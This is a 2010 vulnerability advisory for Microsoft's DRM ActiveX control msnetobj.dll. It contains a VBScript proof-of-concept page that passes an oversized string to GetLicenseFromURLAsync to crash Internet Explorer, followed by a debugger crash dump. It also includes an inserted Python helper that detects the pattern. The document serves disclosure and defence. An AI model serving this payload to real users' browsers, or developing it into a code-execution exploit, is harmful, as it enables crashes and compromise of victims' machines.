Microsoft DRM Technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
Source: informationhacker08@gmail.com  Author: Tripathi  Published: 2010-09-21

============================================================================================
     Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
============================================================================================

                                         by

                             Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh Kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 18th Sep 2010

# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote
             vulnerabilities such as buffer overflow, integer overflow and denial of service
             (IE crash). The issue is triggered when an attacker convinces a victim user to
             visit a malicious website.

             The "GetLicenseFromURLAsync" method does not handle its input correctly; the proof
             of concept below passes an oversized string as its second argument and crashes IE.

             Remote attackers may exploit this issue to execute arbitrary machine code in the
             context of the affected application, facilitating the remote compromise of
             affected computers. Failed exploit attempts likely result in browser crashes.

=============================================Proof Of Concept=============================================
 


<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />
<script language='vbscript'>

' Template variables describing the target control and method; not used by the call below
targetFile = "C:\Windows\System32\msnetobj.dll"
prototype  = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String ,  ByVal bstrURL As String )"
memberName = "GetLicenseFromURLAsync"
progid     = "MSNETOBJLib.RMGetLicense"
argCount   = 2

arg1="defaultV"
arg2=String(8212, "A")   ' oversized bstrURL argument (8212 x "A") that triggers the crash

RM.GetLicenseFromURLAsync(arg1 ,arg2)

</script>
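The following detection helper is added here as an example and is not part of the original advisory or of any Microsoft component: it scans a saved HTML page for an <object> bound to the msnetobj CLSID above and flags calls to GetLicenseFromURLAsync whose string arguments are statically oversized, as in the PoC. The 1024-byte threshold, the helper names and the embedded sample page are assumptions constructed for this example.

```python
import re

# CLSID and method come from the advisory above; the threshold is this example's assumption.
MSNETOBJ_CLSID = "A9FC132B-096D-460B-B7D5-1DB0FAE0C062"
VULN_METHOD = "GetLicenseFromURLAsync"
MAX_SANE_ARG_LEN = 1024  # the PoC passes 8212 bytes, far beyond any real license URL
_OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I)
_ATTR = re.compile(r"(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\"|([^\s/>]+))")
_STRING_FN = re.compile(r"^String\s*\(\s*(\d+)\s*,", re.I)  # String(n, "A") -> n chars
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)    # VBScript: name = expr

def _literal_len(expr, env):
    # Static length of a VBScript string expression, or None if not knowable.
    expr = expr.strip()
    m = _STRING_FN.match(expr)
    if m:
        return int(m.group(1))
    if len(expr) >= 2 and expr[0] == expr[-1] == '"':
        return len(expr) - 2
    return env.get(expr)  # a variable assigned earlier in the script

def scan_html(html):
    # One finding per call of the vulnerable method on an msnetobj <object>.
    ids = set()
    for tag in _OBJECT_TAG.finditer(html):
        a = {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
             for m in _ATTR.finditer(tag.group(1))}
        if a.get("classid", "").lower() == "clsid:" + MSNETOBJ_CLSID.lower() and "id" in a:
            ids.add(a["id"])
    env = {}
    for name, expr in _ASSIGN.findall(html):  # resolve simple assignments first
        n = _literal_len(expr, env)
        if n is not None:
            env[name] = n
    findings = []
    for obj_id in sorted(ids):
        call = re.compile(r"\b%s\.%s\s*\(([^)]*)\)" % (re.escape(obj_id), VULN_METHOD), re.I)
        for m in call.finditer(html):
            lens = [_literal_len(arg, env) for arg in m.group(1).split(",")]
            longest = max((n for n in lens if n is not None), default=0)
            findings.append({"object_id": obj_id, "arg_lengths": lens,
                             "suspicious": longest > MAX_SANE_ARG_LEN})
    return findings

# Constructed sample mirroring the PoC above (not a live page).
SAMPLE_POC = r"""<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />
<script language='vbscript'>
arg2=String(8212, "A")
RM.GetLicenseFromURLAsync("defaultV", arg2)
</script>"""
```

Running scan_html(SAMPLE_POC) reports the call with argument lengths [8, 8212] as suspicious, while the same page with a short literal URL is not flagged.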
=============================================Exception details=============================================
Exception Code: ACCESS_VIOLATION
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]

Seh Chain:
--------------------------------------------------
1  76E7E47D  msvcrt.dll
2  77BB99FA  ntdll.dll


Called From                   Returns To                   
--------------------------------------------------
ntdll.77BEEA7F                ntdll.77BEE9D9               
ntdll.77BEE9D9                KERNEL32.770E7F75            
KERNEL32.770E7F75             ole32.779EB3E1               
ole32.779EB3E1                ole32.779EB50A               
ole32.779EB50A                ole32.779AF6F6               
ole32.779AF6F6                ole32.779AF794               
ole32.779AF794                msnetobj.6B823726            
msnetobj.6B823726             msnetobj.6B823814            
msnetobj.6B823814             msnetobj.6B823C40            
msnetobj.6B823C40             msnetobj.6B823FA7            
msnetobj.6B823FA7             msnetobj.6B824513            
msnetobj.6B824513             msnetobj.6B823A9D            
msnetobj.6B823A9D             msvcrt.76E82599              
msvcrt.76E82599               msvcrt.76E826B3              
msvcrt.76E826B3               KERNEL32.770ED0E9            
KERNEL32.770ED0E9             ntdll.77BF19BB               
ntdll.77BF19BB                ntdll.77BF198E               


Registers:
--------------------------------------------------
EIP 77BEEA7F
EAX 00000054
EBX 00032A78 -> Asc: GsHd(
ECX 00000000
EDX 00000004
EDI 035CEE28 -> 7FFD8000
ESI 6B821434
EBP 035CEE48 -> 035CEE90
ESP 035CEE0C -> 00032A78


Block Disassembly:
--------------------------------------------------
77BEEA68 PUSH EDI
77BEEA69 JNZ 77C25E3F
77BEEA6F TEST BYTE PTR [EBX+10],1
77BEEA73 JE 77C25E93
77BEEA79 MOV EAX,[EBX+18]
77BEEA7C LEA EDI,[EBP-20]
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]   <--- CRASH
77BEEA80 PUSH 77BEEABD
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA86 PUSH 1C
77BEEA88 ADD EAX,EBX
77BEEA8A PUSH EDX
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA8C PUSH EAX
77BEEA8D LEA EAX,[EBP-20]


ArgDump:
--------------------------------------------------
EBP+8 00032A78 -> Asc: GsHd(
EBP+12 6B821434
EBP+16 035CEEB0 -> 00000040
EBP+20 00000000
EBP+24 77AC1424 -> 779EBEC8
EBP+28 6B821434


Stack Dump:
--------------------------------------------------
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03  [..............\.]
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F  [.......k........]
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03  [D.\..l.wh.\...\.]
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03  [..\...\..Y.u..\.]
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03  [...w.......k..\.]


ApiLog:
--------------------------------------------------
***** Installing Hooks *****
7735d5c0     RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))

Debug String Log:
--------------------------------------------------